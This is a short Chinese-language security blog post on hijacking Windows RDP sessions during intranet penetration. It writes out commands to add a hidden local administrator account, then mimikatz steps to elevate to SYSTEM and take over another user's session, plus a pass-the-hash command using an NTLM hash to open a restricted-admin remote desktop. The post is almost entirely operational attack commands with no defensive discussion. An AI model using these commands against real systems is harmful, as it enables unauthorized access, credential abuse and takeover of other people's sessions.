Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

关于RDP劫持小技巧

内网渗透 Adminxe 42℃ 0评论

一、劫持方式1:

创建用户:

net user test 123.com /add

net localgroup administrators test /add

登录后,使用mimikatz工具

privilege::debug #提权

ts::sessions #查看当前主机的会话

token::elevate #提升本地管理员权限为system

ts::remote /id:1 #劫持id为1的会话

二、劫持方式2:

mimikatz命令如下:

privilege::debug

sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 “/run:mstsc.exe /restrictedadmin”


执行后弹出远程登录界面,如下图 选择连接,成功实现远程登录

转载请注明:Adminxe's Blog » 关于RDP劫持小技巧

喜欢 (0)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址